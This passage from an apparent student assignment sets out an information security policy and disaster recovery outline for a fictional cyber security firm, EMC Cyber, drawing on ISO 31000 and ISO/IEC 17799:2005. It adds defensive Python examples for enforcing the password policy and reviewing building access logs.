stakeholders, so that the risk management process concentrates on the relevant factors
and so that decisions and specific risk treatment options can be justified.

Figure 11 ISO 31000 Risk Management

The standard includes several principles that risk management should satisfy. Risk management:

 creates and protects value
 is based on the best available information
 is an integral part of organizational processes
 is tailored
 is part of decision-making
 takes human and cultural factors into account
 explicitly addresses uncertainty
 is transparent and inclusive
 is systematic, structured, and timely
 is dynamic, iterative, and responsive to change
 facilitates continual improvement of the organization

Activity 04
4.1 Design an organizational security policy for EMC Cyber to minimize exploitations
and misuses while evaluating the suitability of the tools used in an organizational policy.

Security Policy
What is a Security Policy?
For a system, organisation, or other entity, a security policy defines what it means to be
secure. It addresses the behavioural restrictions placed on an organization's members as well
as the restrictions placed on enemies by devices like walls, doors, locks, and keys. The
security policy for systems addresses restrictions on the functions and communication
between them, restrictions on access by external systems and enemies, including
programmes, and restrictions on human access to data.

If security is crucial, then it is important to make sure that all security policies are
implemented by robust procedures. Established techniques and risk assessment strategies exist
to ensure that security policies are comprehensive and well enforced. In complex systems,
such as information systems, policies can be divided into sub-policies to make it easier to
assign security measures to enforce them. This approach has a drawback, though: it is far too
easy to skip the top-level policy and go straight to the sub-policies, which are effectively
operating procedures. That gives the impression that the rules of operation address some
broad meaning of security when they do not. Rules of operation described as "sub-policies"
without a "super-policy" typically end up as meandering rules that fail to enforce anything
completely, because it is so difficult to reason clearly and completely about security.
Therefore a top-level security policy is necessary for any real security scheme; without it,
sub-policies and operational guidelines are of little use.

Importance of security policy

 Guides the implementation of technical controls
o A security policy outlines the intents and expectations of senior management
about security, but it does not offer precise low-level technical assistance. The
security or IT teams are then responsible for translating these ideas into
precise technological actions.
 Sets clear expectations
o Without a security policy, it will be up to each employee or user to exercise
their own discretion to determine what is and is not acceptable. When various
personnel use different standards, this may be disastrous.
 Helps meet regulatory and compliance requirements
o Legislation like HIPAA and Sarbanes-Oxley, as well as rules and standards
like PCI-DSS, ISO 27001, and SOC2, all call for the documentation of
security policies. A security policy is frequently a practical need in developing
a plan to comply with ever-stricter security and data privacy regulations, even
when it is not officially mandated.
 Improves organizational efficiency and helps meet business objectives
o The effectiveness of a company may be increased with a sound security
policy. Because of its policies, everyone is on the same page, there is no need
for duplicate work, and compliance is consistently monitored and enforced.
Security policies should be very specific about when and by whom policy
exceptions are to be allowed.

EMC Cyber Security Policy
Company Description

‘EMC Cyber’ is a reputed cyber security company based in Colombo Sri Lanka that is
delivering security products and services across the entire information technology
infrastructure. The company has several clients both in Sri Lanka and abroad, which includes
some of the top-level companies of the world serving in multitude of industries. The
company develops cyber security software including firewalls, anti-virus, intrusion detection
and protection, and endpoint security. EMC Cyber is tasked with protecting companies’
networks, clouds, web applications and emails. They also offer advanced threat protection,
secure unified access, and endpoint security. Further they also play the role of consulting
clients on security threats and how to solve them. Additionally, the company follows
different risk management standards depending on the company, with the ISO 31000 being
the most prominent.

Policy Description

All workers of the organisation must receive a copy of this policy document, which covers
all facets of protection of confidential corporate information. All workers of the company are
required to read this document in its entirety and sign the form attesting that they have done
so. Every year, or as needed, management will review and update this document to reflect
newly created security requirements and disseminate it to all employees and contractors as
necessary.

Every day, EMC Cyber handles user security data. To secure it, to preserve users' privacy, to
guarantee compliance with numerous rules, and to safeguard the organisation's future,
sensitive information must have sufficient protections in place.

Every customer's privacy will be respected by EMC Cyber, and any information about them
will be shielded from prying eyes. To fulfil these commitments, management is dedicated to
keeping a secure environment in which to handle user information. Personnel handling
sensitive user information must:

 Limit personal use of the EMC Cyber information and telecommunication systems and
make sure it does not affect how well they do their job. EMC Cyber reserves the right to
monitor, access, review, audit, copy, store or delete any security data, equipment,
systems and network traffic for any reason.
 Not participate in any activity that is offensive, intimidating, discriminatory,
defamatory, malicious, abusive, harassing or unlawful using email, the internet or any
other company resource.
 Maintain account and password security.
 Obtain management's clearance before creating any new software, hardware or
third-party connection.
 Use the automatic screen-lock feature when leaving the computer unattended.
 Protect the details of users (and their own).
 Not install unlicensed software or hardware, such as wireless access points and
modems, without clear management consent.
 Report cybersecurity issues immediately to the person in charge of local incident
response.

We are all accountable for preventing unauthorised access to and inappropriate use of the
systems and data within our organisation. You should consult your line manager for advice
and direction if you have any questions regarding any of the policies outlined here.

Passwords Security
Passwords must be created and managed in accordance with this section.

Password Requirements

 All user-level EMC Cyber network passwords will expire every 90 days and must be
changed.
 New passwords cannot be the same as the previous four passwords.
 Passwords must be at least eight characters in length. Longer is better.
 Passwords must contain both uppercase and lowercase characters (a-z and A-Z).
 Passwords must contain at least one number (0-9).
 Accounts shall be locked after six failed login attempts within 30 minutes and shall
remain locked for at least 30 minutes or until the System Administrator unlocks the
account.

Some EMC Cyber systems need the Technology Department to give the user a new temporary
password to unlock an account or change a password without signing in. In such cases the
temporary password must be given verbally, and the user must sign in right away and set a
new password.

Passwords should not be disclosed to anybody, even IT support staff, unless the IT Security
Specialist has given permission.

All passwords must be handled with the utmost care and confidentiality. If someone asks for
your password(s), tell them that EMC Cyber policy does not allow you to share it and direct
them to the IT Security Specialist. If you believe an account or password has been
compromised, change every associated password and report the situation right away.

Password cracking or guessing may be carried out periodically or at random by the
Technology Department or approved outside penetration testers to test the security of the
EMC Cyber network. If a password is guessed or cracked during one of these checks, the
user will be required to reset it. Nobody other than the Technology Department or an
authorised outside auditor is permitted to attempt to guess or crack passwords.
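The password requirements above are precise enough to be enforced in code rather than left to each system's defaults. The Python below is an added example, not EMC Cyber's own code or any product's implementation: it applies the stated rules (at least eight characters, upper and lower case, a digit, no reuse of the previous four passwords, 90-day expiry, lockout after six failures within 30 minutes for 30 minutes or until an administrator unlocks). The class and function names, the salted PBKDF2 hashing and the iteration count are assumptions; the sample passwords and timestamps are constructed. Note that time is passed in explicitly so the expiry and lockout windows can be exercised without waiting.

```python
"""Password-policy enforcement matching the EMC Cyber requirements (added example).

Not EMC Cyber's own code. Implements: 8+ characters, upper and lower case, a
digit, no reuse of the last four passwords, 90-day expiry, and lockout after
six failures inside 30 minutes, lasting 30 minutes or until admin unlock.
Names and the hashing scheme (salted PBKDF2-HMAC-SHA256) are assumptions.
"""
import hashlib
import hmac
import os
import time
from collections import deque
from typing import Optional

MIN_LENGTH = 8
HISTORY_DEPTH = 4               # current password plus the three before it
MAX_FAILURES = 6
FAILURE_WINDOW = 30 * 60        # seconds
LOCKOUT_SECONDS = 30 * 60
MAX_AGE_SECONDS = 90 * 24 * 3600
PBKDF2_ROUNDS = 50_000          # assumed; kept low for the demonstration, raise in production


def hash_password(password: str, salt: Optional[bytes] = None):
    """Salted PBKDF2-HMAC-SHA256; returns (salt, digest)."""
    salt = salt if salt is not None else os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, PBKDF2_ROUNDS)
    return salt, digest


def check_complexity(password: str) -> list:
    """Return the composition rules the password breaks (empty list = passes)."""
    problems = []
    if len(password) < MIN_LENGTH:
        problems.append(f"shorter than {MIN_LENGTH} characters")
    if not any(c.islower() for c in password):
        problems.append("no lowercase letter")
    if not any(c.isupper() for c in password):
        problems.append("no uppercase letter")
    if not any(c.isdigit() for c in password):
        problems.append("no digit")
    return problems


class Account:
    def __init__(self, username: str, password: str, now: Optional[float] = None):
        self.username = username
        self.history = deque(maxlen=HISTORY_DEPTH)   # (salt, digest) of recent passwords
        self.failures = deque()                       # timestamps of recent failed logins
        self.locked_until = 0.0
        self.changed_at = 0.0
        problems = self.change_password(password, now)
        if problems:
            raise ValueError("initial password rejected: " + "; ".join(problems))

    def _matches(self, password: str, salt: bytes, digest: bytes) -> bool:
        return hmac.compare_digest(hash_password(password, salt)[1], digest)

    def change_password(self, new_password: str, now: Optional[float] = None) -> list:
        """Apply the composition and reuse rules; returns the reasons for rejection."""
        problems = check_complexity(new_password)
        if any(self._matches(new_password, s, d) for s, d in self.history):
            problems.append(f"matches one of the previous {HISTORY_DEPTH} passwords")
        if problems:
            return problems
        self.history.append(hash_password(new_password))   # oldest entry drops off automatically
        self.changed_at = time.time() if now is None else now
        return []

    def login(self, password: str, now: Optional[float] = None) -> str:
        """Returns 'ok', 'expired', 'denied' or 'locked'."""
        now = time.time() if now is None else now
        if now < self.locked_until:
            return "locked"
        while self.failures and now - self.failures[0] > FAILURE_WINDOW:
            self.failures.popleft()                      # forget failures outside the window
        salt, digest = self.history[-1]                  # the current password
        if self._matches(password, salt, digest):
            self.failures.clear()
            return "expired" if now - self.changed_at > MAX_AGE_SECONDS else "ok"
        self.failures.append(now)
        if len(self.failures) >= MAX_FAILURES:
            self.locked_until = now + LOCKOUT_SECONDS
            self.failures.clear()
            return "locked"
        return "denied"

    def admin_unlock(self) -> None:
        """The System Administrator override the policy allows."""
        self.locked_until = 0.0
        self.failures.clear()


if __name__ == "__main__":
    acct = Account("jdoe", "Winter2022x", now=0.0)      # constructed sample account
    print(acct.change_password("short1A"))              # too short
    print(acct.change_password("Winter2022x"))          # reuse of a recent password
    print(acct.login("wrong", now=1.0))                 # denied, first failure of six
```

Returning the lockout decision from the same function that verifies the password keeps the failure counter authoritative on the server side; a client-side counter would let an attacker simply ignore it.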

Protective Measures
1) Do not share EMC Cyber passwords with anyone, including administrative assistants
or secretaries. All passwords are to be treated as sensitive, confidential EMC Cyber
information.
2) Passwords should never be written down or stored online without encryption.
3) Do not reveal a password in email, chat, or other electronic communication.
4) Do not speak about a password in front of others.
5) Do not hint at the format of a password (e.g., "my family name").
6) Do not reveal a password on questionnaires or security forms.
7) If someone demands a password, refer them to this document and direct them to the
IT Department.
8) Always decline the use of the "Remember Password" feature of applications.

Email

Use of the EMC Cyber e-mail system is prohibited for the creation or dissemination of any
disruptive or offensive communications, including pornographic material and derogatory
remarks regarding race, gender, age, sexual orientation, disability or religious practice.
Employees who receive any email with such content from any EMC Cyber personnel should
notify their supervisor right away. There are no exceptions to the outright ban on the
following actions:

1) Sending unsolicited email, such as "junk mail" or other promotional material, to
people who have not expressly asked for it (email spam).
2) Any type of email, phone or paging harassment, regardless of the content, frequency
or volume of the communications.
3) Soliciting email to any address other than the poster's own account with the intent to
harass or to collect replies.
4) Unauthorised use or forging of email header information.
5) Posting identical or similar non-business-related messages to a large number of
Usenet newsgroups (newsgroup spam).

Use of EMC Cyber resources for personal use is permitted in moderation; however, personal
email must be kept in a folder set aside for that purpose, separate from work-related mail.

Sending chain letters or joke emails from an EMC Cyber email address is forbidden. Virus or
other malware alerts and bulk mailings from unapproved sources must be cleared by the EMC
Cyber IT department before they are sent. The forwarding of mail received by an EMC Cyber
employee is subject to the same limitations.

Email Security Measures

 EMC Cyber employees must be trained in email security best practices.
 Create strong passwords.
 Don't reuse passwords across accounts.
 Consider not changing passwords regularly.
 Use multifactor authentication (MFA).
 Take phishing seriously.
 Be wary of email attachments.
 Don't click email links.
 Don't use business email for personal use and vice versa.
 Avoid public Wi-Fi.
 Use email security protocols and tools.

Network and Server Security

The system must be updated with the most recent security patches as soon as practicable,
except where doing so would conflict with operational needs.

Physically, servers should be situated in an area with access controls.

It is expressly forbidden to run servers from unsupervised cubicle spaces.

Network Administration will assess each discrepancy and take appropriate action.

The Information Security Office publishes updates to network device operating systems
and/or configuration settings that adhere to Company requirements. Within the time range
specified by the Information security Office, updates must be implemented.

Before being connected to the network, all network device settings must meet the
requirements outlined in the EMC Cyber setup handbook. This document has been used to
develop a boilerplate configuration that will be applied to each network device before it is
connected to the network.

Server Malware Protection

Anti-Virus: All servers MUST have an anti-virus application installed that offers real-time
scanning protection to files and applications running on the target system if they meet one or
more of the following conditions:

 Non-administrative users have remote access to the server.
 The server is a file server.
 Shares on this server are reachable from systems used by non-administrative users.
 HTTP/FTP access to the server is open from the Internet.

Anti-Virus for Mail Servers: If the target system is a mail server, it MUST run an internal or
external anti-virus scanning programme that scans every mail going to and from the mail
server. Local anti-virus scanning MAY be deactivated during backups if an external anti-virus
programme is still scanning incoming mail while the backup is being made.

Acceptable use
The Management does not want to impose limitations that are at odds with the Organization's
long-standing culture of openness, trust, and honesty. The management team is dedicated to
defending the company from improper or harmful behaviour by people who may do so
intentionally or unintentionally.

 Employees must use sound judgement when determining whether personal usage is
appropriate.
 For the usage of technology, employees should make sure they have the necessary
credentials and are verified.
 Employees are required to take all reasonable precautions to avoid unauthorised
access to sensitive information, including cardholder data.
 Employees are responsible for ensuring that technologies are employed and set up in
proper network locations.
 A password-protected screensaver with an automated activation function set to 10
minutes or less should be used to safeguard all PCs, laptops, and workstations.
Alternatively, users should log out when leaving their computers unattended. Caution
should be used since information on portable laptops is particularly sensitive.
 Unless overruled by departmental or group policy, all PCs, laptops, and workstations
used by the employee and linked to the EMC Cyber network, whether owned by the
employee or EMC Cyber, should be continuously executing certified virus-scanning
software with a current virus database.
 Employees must exercise great caution when opening email attachments from
unfamiliar senders as they can include Trojan horse malware, viruses, or email
bombs.
 Do not share accounts and keep your passwords private. Password and account
security is the responsibility of authorised users. User level passwords should be
updated every six to eight months, while system level passwords should be changed
every quarter.

Physical access
• The use of physical security systems is subject to all applicable laws, including but not limited to building and fire safety standards.
• Physical access to all EMC Cyber restricted facilities must be monitored and controlled.
• Physical protection of all Cyber Security facilities must be proportionate to the significance or criticality of their function at EMC Cyber.
• Only EMC Cyber support staff and contractors whose job duties require access to a Cyber Security facility may be granted access to it.
• Every facility entrance that could be used by unauthorised people must be guarded.
• Secure areas must be protected to reduce the risks from environmental hazards and the opportunities for unauthorised entry. Information processing facilities handling sensitive information should be sited so that information in use cannot be observed by unauthorised people.
• Measures must be implemented to reduce the risk of physical and environmental threats.
• Environmental conditions that could impair the operation of information processing facilities, such as temperature and humidity, must be monitored.
• Directories and internal phone books that reveal the locations of facilities processing sensitive information must not be easily accessible to unauthorised parties.
• Equipment must be protected from power failures and other disruptions caused by utility faults.
• Restricted-access locations must carry no signs or other indications of the location's significance.
• A sign-in/sign-out record will be kept of visitor access at all EMC Cyber Security locations that admit visitors.
• Card access records and visitor logs for EMC Cyber Security facilities must be retained for routine review, for a period that depends on the importance of the information resources being protected.
• Visitors must always be escorted by authorised employees while in controlled areas of EMC Cyber Security premises.
• The team responsible for the facility's physical security must periodically review its visitor and access logs and investigate any suspicious activity.
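The last bullets require access and visitor logs to be retained and periodically reviewed. The following added example, written for this page and not part of the assignment or of any real badge system, shows what that review can look like when automated: it parses constructed badge-reader records and flags visitor entries into controlled areas with no staff entry close enough to count as an escort, visitors who never signed out, bursts of denied badge attempts, and entries into restricted zones outside business hours. The log format, the `RESTRICTED-` zone naming, the two-minute escort window, the business hours and the denied-attempt threshold are all assumptions of the example.

```python
from collections import defaultdict
from datetime import datetime, timedelta
from typing import Dict, List

# Review parameters; all are assumptions of this example, not policy values.
ESCORT_WINDOW = timedelta(minutes=2)   # a staff entry this close counts as the escort
BUSINESS_HOURS = (7, 19)               # 07:00-19:00 local time
DENIED_THRESHOLD = 3                   # this many denials ...
DENIED_WINDOW = timedelta(minutes=10)  # ... within this window is suspicious
RESTRICTED_PREFIX = "RESTRICTED-"      # zone names used for controlled areas


def parse_log(text: str) -> List[Dict]:
    """Parse 'timestamp,badge,badge_type,zone,action' lines, oldest first."""
    events = []
    for line in text.strip().splitlines():
        ts, badge, btype, zone, action = (p.strip() for p in line.split(","))
        events.append({"ts": datetime.fromisoformat(ts), "badge": badge,
                       "type": btype, "zone": zone, "action": action})
    return sorted(events, key=lambda e: e["ts"])


def review_access_log(events: List[Dict]) -> List[str]:
    """Return human-readable findings for the facility security team to investigate."""
    findings: List[str] = []
    staff_entries = [e for e in events if e["type"] == "STAFF" and e["action"] == "ENTRY"]

    # 1. Visitors in controlled areas must be escorted: require a staff entry
    #    into the same zone within ESCORT_WINDOW of the visitor's entry.
    for e in events:
        if e["type"] == "VISITOR" and e["action"] == "ENTRY" and e["zone"].startswith(RESTRICTED_PREFIX):
            escorted = any(s["zone"] == e["zone"] and abs(s["ts"] - e["ts"]) <= ESCORT_WINDOW
                           for s in staff_entries)
            if not escorted:
                findings.append(f"{e['ts']:%H:%M} unescorted visitor {e['badge']} entered {e['zone']}")

    # 2. Sign-in/sign-out: a visitor badge with an ENTRY but no later EXIT never signed out.
    open_visits: Dict[str, Dict] = {}
    for e in events:
        if e["type"] != "VISITOR":
            continue
        if e["action"] == "ENTRY":
            open_visits.setdefault(e["badge"], e)   # remember the first sign-in
        elif e["action"] == "EXIT":
            open_visits.pop(e["badge"], None)       # any later EXIT counts as sign-out
    for badge, e in open_visits.items():
        findings.append(f"visitor {badge} signed in at {e['ts']:%H:%M} with no sign-out")

    # 3. Repeated denied attempts by one badge inside a short window.
    denied = defaultdict(list)
    for e in events:
        if e["action"] == "DENIED":
            denied[e["badge"]].append(e["ts"])
    for badge, times in denied.items():
        for i in range(len(times) - DENIED_THRESHOLD + 1):
            if times[i + DENIED_THRESHOLD - 1] - times[i] <= DENIED_WINDOW:
                findings.append(f"badge {badge}: {DENIED_THRESHOLD} denied attempts within {DENIED_WINDOW}")
                break

    # 4. Entry to a restricted zone outside business hours.
    for e in events:
        if e["action"] == "ENTRY" and e["zone"].startswith(RESTRICTED_PREFIX):
            if not BUSINESS_HOURS[0] <= e["ts"].hour < BUSINESS_HOURS[1]:
                findings.append(f"{e['ts']:%H:%M} after-hours entry by {e['badge']} into {e['zone']}")
    return findings


# Constructed badge-reader records for one day (not a real log).
SAMPLE_LOG = """
2022-10-12T08:55:00,S-1041,STAFF,LOBBY,ENTRY
2022-10-12T09:00:00,V-0007,VISITOR,LOBBY,ENTRY
2022-10-12T09:01:00,S-1041,STAFF,RESTRICTED-DC,ENTRY
2022-10-12T09:01:30,V-0007,VISITOR,RESTRICTED-DC,ENTRY
2022-10-12T09:45:00,V-0007,VISITOR,LOBBY,EXIT
2022-10-12T10:30:00,V-0012,VISITOR,LOBBY,ENTRY
2022-10-12T10:32:00,V-0012,VISITOR,RESTRICTED-DC,ENTRY
2022-10-12T12:00:00,S-2099,STAFF,RESTRICTED-DC,DENIED
2022-10-12T12:03:00,S-2099,STAFF,RESTRICTED-DC,DENIED
2022-10-12T12:05:00,S-2099,STAFF,RESTRICTED-DC,DENIED
2022-10-12T22:40:00,S-1041,STAFF,RESTRICTED-DC,ENTRY
"""

if __name__ == "__main__":
    for finding in review_access_log(parse_log(SAMPLE_LOG)):
        print(finding)
```

On the sample data, visitor V-0007 is escorted into the data centre and signs out, so it produces nothing; V-0012 is flagged twice (unescorted, never signed out), S-2099 for the burst of denials, and S-1041 for the late-night entry. The same rules apply equally to paper sign-in sheets once they are transcribed into the same five-field format.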
Disciplinary Measures

Employees who violate the standards, rules, and procedures set out in this document will face disciplinary action, ranging from a warning or reprimand to termination of employment. Ignorance, good intentions, or poor judgement will not be accepted as excuses for violating these rules.

4.2 Develop and present a disaster recovery plan for EMC Cyber according to ISO/IEC 17799:2005 or a similar standard, which should include the main components of an organizational disaster recovery plan with justifications. Discuss how critical the roles of the stakeholders in the organization are to successfully implementing the security policy and the disaster recovery plan you recommended as part of the security audit.

EMC Cyber – Disaster Recovery Plan

[Figures 12–36: slides of the EMC Cyber disaster recovery plan presentation, reproduced as images in the original. Captioned slides: Figure 12 DRP; Figure 13 DRP contents; Figure 14 DRP company intro; Figure 15 Disaster; Figure 16 Disaster recovery plan; Figure 17 DRP; Figure 18 EMC Cyber - DRP; Figure 21 RTO and RPO; Figure 25 Stakeholders; Figure 26 Types of stakeholders; Figure 27 Internal stakeholder; Figure 28 Employee; Figure 29 Owner; Figure 30 Manager; Figure 31 External stakeholders; Figure 32 Customer; Figure 33 Suppliers; Figure 34 Governments; Figure 35 Community; Figure 36 The end. Figures 19, 20, 22, 23 and 24 carry no caption.]

ISO/IEC 17799:2005
ISO/IEC 17799:2005 sets out general principles and guidelines for establishing, implementing, maintaining, and improving information security management in an organisation. The objectives it lists give general guidance on the commonly accepted goals of information security management. Its best-practice control objectives and controls cover the following areas of information security management:

• security policy
• organization of information security
• asset management
• human resources security
• physical and environmental security
• communications and operations management
• access control
• information systems acquisition, development, and maintenance
• information security incident management
• business continuity management
• compliance.

The control objectives and controls in ISO/IEC 17799:2005 are intended to be implemented to meet the requirements identified by a risk assessment. The standard is meant to serve as a common basis and practical guideline for developing organisational security standards and effective security management practices, and to help build confidence in inter-organisational activities.

References
https://www.iso.org/standard/39612.html – ISO

https://cloudian.com/guides/disaster-recovery/4-disaster-recovery-plan-examples-and-10-essential-plan-items/#micro-focus – DRP

https://en.wikipedia.org/wiki/Security_policy – Security policy

https://www.getastra.com/blog/security-audit/it-security-audit/amp/ – Security audit

https://www.techtarget.com/searchnetworking/definition/network-management-system – Network management system

https://www.sciencedirect.com/topics/computer-science/security-procedure – Security procedure
